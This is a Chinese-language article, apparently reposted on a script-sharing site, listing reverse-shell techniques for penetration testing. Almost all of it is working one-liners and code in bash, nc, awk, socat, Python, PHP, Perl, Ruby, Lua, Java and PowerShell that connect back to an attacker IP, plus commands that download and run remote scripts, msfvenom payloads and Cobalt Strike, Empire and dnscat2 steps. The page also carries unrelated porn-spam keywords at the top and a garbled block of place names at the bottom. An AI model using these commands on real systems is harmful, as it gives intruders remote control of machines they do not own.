最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

反彈shell的幾種姿勢小結(jié)

 更新時間:2021年07月30日 16:40:39   作者:Bypass  
在滲透過程中,往往因為端口限制而無法直連目標機器,此時需要通過反彈shell來獲取一個交互式shell,以便繼續(xù)深入,本文就介紹了幾種方法,感興趣的可以了解一下

在滲透過程中,往往因為端口限制而無法直連目標機器,此時需要通過反彈shell來獲取一個交互式shell,以便繼續(xù)深入。

反彈shell是打開內(nèi)網(wǎng)通道的第一步,也是權(quán)限提升過程中至關(guān)重要的一步。所有姿勢整理自網(wǎng)絡(luò),假設(shè),攻擊者主機為:192.168.99.242,本地監(jiān)聽1234端口,如有特殊情況以下會備注說明。

Linux 反彈shell

姿勢一:bash反彈

bash -i >& /dev/tcp/192.168.99.242/1234 0>&1

base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk5LjI0Mi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'

在線編碼地址:http://www.jackson-t.ca/runtime-exec-payloads.html

其他版本:

exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5;done
exec /bin/sh 0</dev/tcp/192.168.99.242/1234 1>&0 2>&0

姿勢二:nc反彈

nc -e /bin/bash 192.168.99.242 1234

姿勢三:awk反彈

awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'

姿勢四:telnet反彈

備注:需要在攻擊主機上分別監(jiān)聽1234和4321端口,執(zhí)行反彈shell命令后,在1234終端輸入命令,4321查看命令執(zhí)行后的結(jié)果。

telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321

姿勢五:socat反彈

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234

姿勢六:Python反彈

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.99.242',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

姿勢七:PHP反彈

php -r '$sock=fsockopen("192.168.99.242",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

姿勢八:Perl反彈

perl -e 'use Socket;$i="192.168.99.242";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

姿勢九:Ruby反彈

ruby -rsocket -e'f=TCPSocket.open("192.168.99.242",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

姿勢十:Lua反彈

lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.99.242','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

姿勢十一:JAVA反彈

public class Revs {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

保存為Revs.java文件,編譯執(zhí)行,成功反彈shell。

javac Revs.java 
java Revs

 Windows反彈shell

姿勢一:nc反彈

netcat 下載:https://eternallybored.org/misc/netcat/

服務(wù)端反彈:nc 192.168.99.242 1234 -e c:\windows\system32\cmd.exe

姿勢二:powershell反彈

powercat是netcat的powershell版本,功能免殺性都要比netcat好用的多。

PS C:\WWW>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.99.242 -p 1234 -e cmd

下載到目標機器本地執(zhí)行:

PS C:\WWW> Import-Module ./powercat.ps1PS C:\WWW> powercat -c 192.168.99.242 -p 1234 -e cmd

姿勢三:MSF反彈shell

使用msfvenom生成相關(guān)Payload

msfvenom -l payloads | grep 'cmd/windows/reverse'
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.99.242 LPORT=1234

姿勢四:Cobalt strike反彈shell

1、配置監(jiān)聽器:點擊Cobalt Strike——>Listeners——>在下方Tab菜單Listeners,點擊add。
2、生成payload:點擊Attacks——>Packages——>Windows Executable,保存文件位置。
3、目標機執(zhí)行powershell payload

姿勢五:Empire反彈shell

usestager windows/launcher_vbs
info
set Listener test
execute

姿勢六:nishang反彈shell

Reverse TCP shell:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com /samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.1.1.210 -port 1234

Reverse UDP shell:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 10.1.1.210 -port 1234

姿勢七:Dnscat反彈shell

github項目地址:

https://github.com/iagox86/dnscat2

服務(wù)端:

ruby dnscat2.rb --dns "domain=lltest.com,host=xx.xx.xx.xx" --no-cache -e open -e open 

目標主機:

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1');Start-Dnscat2 -Domain lltest.com -DNSServer xx.xx.xx.xx

到此這篇關(guān)于反彈shell的幾種姿勢小結(jié)的文章就介紹到這了,更多相關(guān)反彈shell內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • linux設(shè)置定時任務(wù)的方法步驟

    linux設(shè)置定時任務(wù)的方法步驟

    這篇文章主要介紹了linux設(shè)置定時任務(wù)的方法步驟,非常不錯,具有參考借鑒價值,需要的朋友可以參考下
    2018-05-05
  • Linux命令每天必學(xué)之 useradd/adduser 新增用戶

    Linux命令每天必學(xué)之 useradd/adduser 新增用戶

    Linux下useradd或adduser命令用來建立用戶帳號和創(chuàng)建用戶的起始目錄,使用權(quán)限是超級用戶。接下來通過本文給大家介紹每天必學(xué)Linux命令之 useradd/adduser 新增用戶的相關(guān)知識,需要的朋友參考下吧
    2018-10-10
  • Shell中的數(shù)學(xué)運算使用

    Shell中的數(shù)學(xué)運算使用

    這篇文章主要介紹了Shell中的數(shù)學(xué)運算使用,文中通過示例代碼介紹的非常詳細,對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2021-03-03
  • Linux ls命令操作詳解

    Linux ls命令操作詳解

    通過 ls 命令,我們可以查看指定目錄下的文件和子目錄,并結(jié)合不同的選項獲取詳細的文件信息,如權(quán)限、大小、修改時間等,這篇文章主要介紹了Linux ls命令詳解,需要的朋友可以參考下
    2025-04-04
  • Bash Shell 注釋多行的幾種方法

    Bash Shell 注釋多行的幾種方法

    這篇文章主要介紹了Bash Shell注釋多行的幾種方法,需要的朋友可以參考下
    2014-12-12
  • Shell腳本連接oracle數(shù)據(jù)庫的實現(xiàn)代碼

    Shell腳本連接oracle數(shù)據(jù)庫的實現(xiàn)代碼

    這篇文章主要介紹了Shell腳本連接oracle數(shù)據(jù)庫的實現(xiàn)代碼,文中通過示例代碼介紹的非常詳細,對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友們下面隨著小編來一起學(xué)習(xí)學(xué)習(xí)吧
    2020-05-05
  • shell腳本語言之if條件判斷語句實例詳解

    shell腳本語言之if條件判斷語句實例詳解

    在寫shell腳本的時候條件判斷是最常用到的,尤其剛寫shell腳本的時候,一些高級命令語法不會使用,到處都是if,下面這篇文章主要給大家介紹了關(guān)于shell腳本語言之if條件判斷語句的相關(guān)資料,需要的朋友可以參考下
    2022-04-04
  • 詳解linux下tree命令的用法

    詳解linux下tree命令的用法

    tree是一種遞歸目錄列表命令,產(chǎn)生一個深度縮進列表文件,這是彩色的ALA dircolors如果ls_colors設(shè)置環(huán)境變量和輸出是TTY。下面通過本文給大家分享linux下tree命令的用法,感興趣的朋友一起看看吧
    2017-09-09
  • 如何利用shell開發(fā)keepalived啟動腳本

    如何利用shell開發(fā)keepalived啟動腳本

    Keepalived軟件起初是專為LVS負載均衡軟件設(shè)計的,用來管理并監(jiān)控LVS集群系統(tǒng)中各個服務(wù)節(jié)點的狀態(tài),后來又加入了可以實現(xiàn)高可用的VRRP功能。這篇文章主要介紹了使用shell開發(fā)keepalived啟動腳本,需要的朋友可以參考下
    2020-03-03
  • clamscan-Linux查毒工具的命令詳解

    clamscan-Linux查毒工具的命令詳解

    這篇文章主要介紹了clamscan-Linux查毒工具命令詳解,非常不錯,具有一定的參考借鑒價值 ,需要的朋友可以參考下
    2019-05-05

最新評論

东乡族自治县| 连平县| 读书| 普兰店市| 民乐县| 万荣县| 杭州市| 东城区| 屯昌县| 济阳县| 手机| 银川市| 建瓯市| 手机| 巴彦淖尔市| 莆田市| 南投市| 栾川县| 九江市| 贡山| 镇平县| 喀喇沁旗| 安新县| 金沙县| 剑河县| 南城县| 武邑县| 延庆县| 马山县| 财经| 庆云县| 噶尔县| 夏河县| 天镇县| 会泽县| 乃东县| 桐梓县| 武川县| 虎林市| 吉木乃县| 丰顺县|